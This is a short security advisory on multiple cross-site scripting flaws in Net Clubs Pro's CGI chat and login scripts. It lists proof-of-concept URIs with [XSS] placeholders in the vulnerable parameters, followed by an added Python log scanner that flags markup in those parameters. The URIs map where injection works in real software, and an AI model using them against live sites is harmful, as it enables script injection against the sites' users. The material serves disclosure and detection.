Net Clubs Pro Multiple Cross-Site Scripting Vulnerabilities



These issues can be exploited through a web client.

The following proof-of-concept URIs are available:

http://www.example.com/cgi-bin/netclubs//vchat/scripts/imessage.cgi?toto=&to=&sentby=&fromuser=r0t&command=changefont&username=[XSS]

http://www.example.com/cgi-bin/netclubs//vchat/scripts/sendim.cgi?onuser=[XSS]

http://www.example.com/cgi-bin/netclubs//vchat/scripts/sendim.cgi?onuser=r0t&pass=[XSS]

http://www.example.com/cgi-bin/netclubs//vchat/scripts/sendim.cgi?onuser=r0t&pass=&chatsys=[XSS]

http://www.example.com/cgi-bin/netclubs//vchat/scripts/sendim.cgi?onuser=r0t&pass=&chatsys=netclubs&searchstring=netclubs&room=[XSS]

http://www.example.com/cgi-bin/netclubs//vchat/scripts/sendim.cgi?onuser=r0t&pass=&chatsys=netclubs&searchstring=netclubs&room=&username=[XSS]

http://www.example.com/cgi-bin/netclubs//vchat/scripts/sendim.cgi?onuser=r0t&pass=&chatsys=netclubs&searchstring=netclubs&room=&username=&to=[XSS]

http://www.example.com/cgi-bin/netclubs//login.cgi?username=r0t&password=[XSS]
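To check whether these parameters are being probed on a deployment, the added example below (not part of the original advisory or of Net Clubs Pro) scans web access-log lines for requests to the three scripts listed above and flags the listed parameters when their decoded value contains HTML metacharacters. The log format, the sample lines and the function names are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Script -> parameters marked [XSS] in the advisory's proof-of-concept URIs.
AFFECTED = {
    "imessage.cgi": {"username"},
    "sendim.cgi": {"onuser", "pass", "chatsys", "room", "username", "to"},
    "login.cgi": {"password"},
}
HTML_META = set("<>\"'")  # characters that must be encoded before being echoed into HTML
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_params(uri):
    """Names of advisory-listed parameters whose decoded value carries HTML metacharacters."""
    parts = urlsplit(uri)
    script = parts.path.rsplit("/", 1)[-1].lower()
    watched = AFFECTED.get(script, set())
    hits = set()
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        # parse_qsl decodes once; decode again to catch double-encoded values.
        if name in watched and HTML_META & set(value + unquote(value)):
            hits.add(name)
    return sorted(hits)

def scan(lines):
    """Return (line_number, parameter_names) for each log line that needs review."""
    findings = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        hits = suspicious_params(match.group(1)) if match else []
        if hits:
            findings.append((number, hits))
    return findings

# Constructed sample access-log lines (not taken from the advisory).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2010:10:00:00 +0000] "GET /cgi-bin/netclubs//vchat/scripts/sendim.cgi?onuser=r0t&pass=&chatsys=netclubs HTTP/1.0" 200 512',
    '192.0.2.11 - - [01/Jan/2010:10:00:05 +0000] "GET /cgi-bin/netclubs//vchat/scripts/sendim.cgi?onuser=r0t&pass=&chatsys=netclubs&searchstring=netclubs&room=%3Cb%3Ex%3C%2Fb%3E HTTP/1.0" 200 540',
    '192.0.2.12 - - [01/Jan/2010:10:00:09 +0000] "GET /cgi-bin/netclubs//login.cgi?username=r0t&password=%253Ci%253Ex HTTP/1.0" 200 300',
    '192.0.2.13 - - [01/Jan/2010:10:00:12 +0000] "GET /cgi-bin/netclubs//vchat/scripts/imessage.cgi?toto=&to=&sentby=&fromuser=r0t&command=changefont&username=alice HTTP/1.0" 200 200',
]

if __name__ == "__main__":
    for number, hits in scan(SAMPLE_LOG):
        print(f"line {number}: review parameters {hits}")
```

A hit means the request carried markup in a parameter the advisory lists; a legitimate value containing a quote character will also be flagged and needs manual review.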


 

Copyright 2010, SecurityFocus